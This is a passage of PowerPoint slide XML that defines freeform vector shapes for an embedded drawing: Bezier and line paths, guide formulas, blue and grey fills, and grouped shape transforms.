                    <a:gd name="T8" fmla="*/ 161 w 217"/>
                    <a:gd name="T9" fmla="*/ 336 h 3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7" h="351">
                      <a:moveTo>
                        <a:pt x="161" y="336"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="176" y="351"/>
                        <a:pt x="217" y="314"/>
                        <a:pt x="197" y="283"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="256"/>
                        <a:pt x="46" y="20"/>
                        <a:pt x="46" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="0"/>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="41"/>
                        <a:pt x="146" y="321"/>
                        <a:pt x="161" y="336"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0061B2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474"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4647" y="2833"/>
                  <a:ext cx="91" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 62"/>
                    <a:gd name="T1" fmla="*/ 49 h 49"/>
                    <a:gd name="T2" fmla="*/ 10 w 62"/>
                    <a:gd name="T3" fmla="*/ 13 h 49"/>
                    <a:gd name="T4" fmla="*/ 0 w 62"/>
                    <a:gd name="T5" fmla="*/ 6 h 49"/>
                    <a:gd name="T6" fmla="*/ 31 w 62"/>
                    <a:gd name="T7" fmla="*/ 0 h 49"/>
                    <a:gd name="T8" fmla="*/ 41 w 62"/>
                    <a:gd name="T9" fmla="*/ 7 h 49"/>
                    <a:gd name="T10" fmla="*/ 62 w 62"/>
                    <a:gd name="T11" fmla="*/ 43 h 49"/>
                    <a:gd name="T12" fmla="*/ 30 w 62"/>
                    <a:gd name="T13" fmla="*/ 49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2" h="49">
                      <a:moveTo>
                        <a:pt x="30" y="49"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="27"/>
                        <a:pt x="10" y="13"/>
                        <a:pt x="10" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="10"/>
                        <a:pt x="3" y="8"/>
                        <a:pt x="0" y="6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5" y="1"/>
                        <a:pt x="38" y="4"/>
                        <a:pt x="41" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="7"/>
                        <a:pt x="49" y="21"/>
                        <a:pt x="62" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="49"/>
                        <a:pt x="30" y="49"/>
                        <a:pt x="30" y="49"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B2B2B2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4" name="Freeform 475"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4675" y="2756"/>
                  <a:ext cx="370" cy="151"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 250"/>
                    <a:gd name="T1" fmla="*/ 59 h 102"/>
                    <a:gd name="T2" fmla="*/ 15 w 250"/>
                    <a:gd name="T3" fmla="*/ 59 h 102"/>
                    <a:gd name="T4" fmla="*/ 15 w 250"/>
                    <a:gd name="T5" fmla="*/ 59 h 102"/>
                    <a:gd name="T6" fmla="*/ 15 w 250"/>
                    <a:gd name="T7" fmla="*/ 60 h 102"/>
                    <a:gd name="T8" fmla="*/ 1 w 250"/>
                    <a:gd name="T9" fmla="*/ 78 h 102"/>
                    <a:gd name="T10" fmla="*/ 13 w 250"/>
                    <a:gd name="T11" fmla="*/ 102 h 102"/>
                    <a:gd name="T12" fmla="*/ 17 w 250"/>
                    <a:gd name="T13" fmla="*/ 101 h 102"/>
                    <a:gd name="T14" fmla="*/ 17 w 250"/>
                    <a:gd name="T15" fmla="*/ 101 h 102"/>
                    <a:gd name="T16" fmla="*/ 250 w 250"/>
                    <a:gd name="T17" fmla="*/ 42 h 102"/>
                    <a:gd name="T18" fmla="*/ 249 w 250"/>
                    <a:gd name="T19" fmla="*/ 0 h 102"/>
                    <a:gd name="T20" fmla="*/ 16 w 250"/>
                    <a:gd name="T21" fmla="*/ 59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50" h="102">
                      <a:moveTo>
                        <a:pt x="16" y="59"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="59"/>
                        <a:pt x="15" y="59"/>
                        <a:pt x="15" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="59"/>
                        <a:pt x="15" y="59"/>
                        <a:pt x="15" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="60"/>
                        <a:pt x="15" y="60"/>
                        <a:pt x="15" y="60"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="61"/>
                        <a:pt x="3" y="69"/>
                        <a:pt x="1" y="78"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="90"/>
                        <a:pt x="5" y="100"/>
                        <a:pt x="13" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="102"/>
                        <a:pt x="16" y="102"/>
                        <a:pt x="17" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="101"/>
                        <a:pt x="17" y="101"/>
                        <a:pt x="17" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="250" y="42"/>
                        <a:pt x="250" y="42"/>
                        <a:pt x="250" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="249" y="0"/>
                        <a:pt x="249" y="0"/>
                        <a:pt x="249" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="16" y="59"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0061B2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Freeform 476"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5023" y="2754"/>
                  <a:ext cx="47" cy="66"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 32"/>
                    <a:gd name="T1" fmla="*/ 44 h 45"/>
                    <a:gd name="T2" fmla="*/ 31 w 32"/>
                    <a:gd name="T3" fmla="*/ 25 h 45"/>
                    <a:gd name="T4" fmla="*/ 19 w 32"/>
                    <a:gd name="T5" fmla="*/ 2 h 45"/>
                    <a:gd name="T6" fmla="*/ 2 w 32"/>
                    <a:gd name="T7" fmla="*/ 21 h 45"/>
                    <a:gd name="T8" fmla="*/ 13 w 32"/>
                    <a:gd name="T9" fmla="*/ 44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45">
                      <a:moveTo>
                        <a:pt x="13" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="45"/>
                        <a:pt x="29" y="36"/>
                        <a:pt x="31" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="13"/>
                        <a:pt x="27" y="3"/>
                        <a:pt x="19" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="4" y="9"/>
                        <a:pt x="2" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="32"/>
                        <a:pt x="5" y="43"/>
                        <a:pt x="13" y="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Freeform 477"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5023" y="2752"/>
                  <a:ext cx="57" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 6 w 39"/>
                    <a:gd name="T1" fmla="*/ 38 h 43"/>
                    <a:gd name="T2" fmla="*/ 31 w 39"/>
                    <a:gd name="T3" fmla="*/ 30 h 43"/>
                    <a:gd name="T4" fmla="*/ 32 w 39"/>
                    <a:gd name="T5" fmla="*/ 4 h 43"/>
                    <a:gd name="T6" fmla="*/ 8 w 39"/>
                    <a:gd name="T7" fmla="*/ 13 h 43"/>
                    <a:gd name="T8" fmla="*/ 6 w 39"/>
                    <a:gd name="T9" fmla="*/ 38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43">
                      <a:moveTo>
                        <a:pt x="6" y="38"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="43"/>
                        <a:pt x="24" y="40"/>
                        <a:pt x="31" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="21"/>
                        <a:pt x="39" y="9"/>
                        <a:pt x="32" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="0"/>
                        <a:pt x="15" y="3"/>
                        <a:pt x="8" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="0" y="34"/>
                        <a:pt x="6" y="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Freeform 478"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5061" y="2764"/>
                  <a:ext cx="43" cy="66"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 69"/>
                    <a:gd name="T1" fmla="*/ 106 h 106"/>
                    <a:gd name="T2" fmla="*/ 0 w 69"/>
                    <a:gd name="T3" fmla="*/ 17 h 106"/>
                    <a:gd name="T4" fmla="*/ 69 w 69"/>
                    <a:gd name="T5" fmla="*/ 0 h 106"/>
                    <a:gd name="T6" fmla="*/ 69 w 69"/>
                    <a:gd name="T7" fmla="*/ 87 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 69"/>
                    <a:gd name="T9" fmla="*/ 106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9" h="106">
                      <a:moveTo>
                        <a:pt x="0" y="106"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="17"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="87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8" name="Freeform 479"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5147" y="2776"/>
                  <a:ext cx="41" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 66"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 66"/>
                    <a:gd name="T3" fmla="*/ 16 h 87"/>
                    <a:gd name="T4" fmla="*/ 66 w 66"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 66 w 66"/>
                    <a:gd name="T7" fmla="*/ 68 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 66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" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="87"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="68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0061B2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480"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5104" y="2764"/>
                  <a:ext cx="43" cy="66"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 68"/>
                    <a:gd name="T1" fmla="*/ 0 h 106"/>
                    <a:gd name="T2" fmla="*/ 0 w 68"/>
                    <a:gd name="T3" fmla="*/ 69 h 106"/>
                    <a:gd name="T4" fmla="*/ 68 w 68"/>
                    <a:gd name="T5" fmla="*/ 106 h 106"/>
                    <a:gd name="T6" fmla="*/ 68 w 68"/>
                    <a:gd name="T7" fmla="*/ 35 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 68"/>
                    <a:gd name="T9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8" h="106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68" y="3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50" name="Freeform 481"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5061" y="2798"/>
                  <a:ext cx="43" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 69"/>
                    <a:gd name="T1" fmla="*/ 90 h 90"/>
                    <a:gd name="T2" fmla="*/ 0 w 69"/>
                    <a:gd name="T3" fmla="*/ 19 h 90"/>
                    <a:gd name="T4" fmla="*/ 69 w 69"/>
                    <a:gd name="T5" fmla="*/ 0 h 90"/>
                    <a:gd name="T6" fmla="*/ 69 w 69"/>
                    <a:gd name="T7" fmla="*/ 71 h 90"/>
                    <a:gd name="T8" fmla="*/ 0 w 69"/>
                    <a:gd name="T9" fmla="*/ 90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9" h="90">
                      <a:moveTo>
                        <a:pt x="0" y="90"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="90"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0061B2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51" name="Freeform 482"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5020" y="2786"/>
                  <a:ext cx="41" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 66"/>
                    <a:gd name="T1" fmla="*/ 0 h 109"/>
                    <a:gd name="T2" fmla="*/ 0 w 66"/>
                    <a:gd name="T3" fmla="*/ 71 h 109"/>
                    <a:gd name="T4" fmla="*/ 66 w 66"/>
                    <a:gd name="T5" fmla="*/ 109 h 109"/>
                    <a:gd name="T6" fmla="*/ 66 w 66"/>
                    <a:gd name="T7" fmla="*/ 38 h 109"/>
                    <a:gd name="T8" fmla="*/ 0 w 66"/>
                    <a:gd name="T9" fmla="*/ 0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" h="109">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="109"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="3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1B2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Freeform 483"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5020" y="2752"/>
                  <a:ext cx="168" cy="58"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 269"/>
                    <a:gd name="T1" fmla="*/ 0 h 92"/>
                    <a:gd name="T2" fmla="*/ 66 w 269"/>
                    <a:gd name="T3" fmla="*/ 0 h 92"/>
                    <a:gd name="T4" fmla="*/ 0 w 269"/>
                    <a:gd name="T5" fmla="*/ 19 h 92"/>
                    <a:gd name="T6" fmla="*/ 0 w 269"/>
                    <a:gd name="T7" fmla="*/ 54 h 92"/>
                    <a:gd name="T8" fmla="*/ 66 w 269"/>
                    <a:gd name="T9" fmla="*/ 92 h 92"/>
                    <a:gd name="T10" fmla="*/ 135 w 269"/>
                    <a:gd name="T11" fmla="*/ 73 h 92"/>
                    <a:gd name="T12" fmla="*/ 66 w 269"/>
                    <a:gd name="T13" fmla="*/ 36 h 92"/>
                    <a:gd name="T14" fmla="*/ 135 w 269"/>
                    <a:gd name="T15" fmla="*/ 19 h 92"/>
                    <a:gd name="T16" fmla="*/ 203 w 269"/>
                    <a:gd name="T17" fmla="*/ 54 h 92"/>
                    <a:gd name="T18" fmla="*/ 269 w 269"/>
                    <a:gd name="T19" fmla="*/ 38 h 92"/>
                    <a:gd name="T20" fmla="*/ 203 w 269"/>
                    <a:gd name="T21" fmla="*/ 0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69" h="92">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="66" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="92"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="203" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="269" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="203" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0061B2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43" name="Group 484"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="276" y="1954"/>
                <a:ext cx="930" cy="476"/>
                <a:chOff x="416" y="1810"/>
                <a:chExt cx="2819" cy="1442"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="254" name="Group 485"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2148" y="2568"/>
                  <a:ext cx="1087" cy="509"/>
                  <a:chOff x="854" y="2913"/>
                  <a:chExt cx="1087" cy="509"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="311" name="Group 486"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks noChangeAspect="1"/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="1254" y="3218"/>
                    <a:ext cx="68" cy="204"/>
                    <a:chOff x="2699" y="3062"/>
                    <a:chExt cx="137" cy="415"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="335" name="Freeform 487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2768" y="3062"/>
                      <a:ext cx="68" cy="415"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 68"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 68 w 68"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 68 w 68"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 0 w 68"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 0 w 68"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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" h="415">
                          <a:moveTo>
                            <a:pt x="0" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="68" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D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36" name="Freeform 48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2699" y="3062"/>
                      <a:ext cx="69" cy="415"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 69 w 69"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 3 w 69"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 0 w 69"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 69 w 69"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 69 w 69"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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9" h="415">
                          <a:moveTo>
                            <a:pt x="69" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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312" name="Group 489"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks noChangeAspect="1"/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="1873" y="3052"/>
                    <a:ext cx="68" cy="204"/>
                    <a:chOff x="2338" y="3066"/>
                    <a:chExt cx="68" cy="204"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="333" name="Freeform 49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2372" y="3066"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 68"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 68 w 68"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 68 w 68"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 0 w 68"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 0 w 68"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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" h="415">
                          <a:moveTo>
                            <a:pt x="0" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="68" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D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34" name="Freeform 491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2338" y="3066"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 69 w 69"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 3 w 69"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 0 w 69"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 69 w 69"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 69 w 69"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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9" h="415">
                          <a:moveTo>
                            <a:pt x="69" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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313" name="Group 492"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks noChangeAspect="1"/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="855" y="3113"/>
                    <a:ext cx="68" cy="204"/>
                    <a:chOff x="2953" y="3232"/>
                    <a:chExt cx="68" cy="204"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="331" name="Freeform 493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2987" y="3232"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 68"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 68 w 68"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 68 w 68"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 0 w 68"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 0 w 68"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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" h="415">
                          <a:moveTo>
                            <a:pt x="0" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="68" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D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32" name="Freeform 49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2953" y="3232"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 69 w 69"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 3 w 69"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 0 w 69"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 69 w 69"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 69 w 69"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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9" h="415">
                          <a:moveTo>
                            <a:pt x="69" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
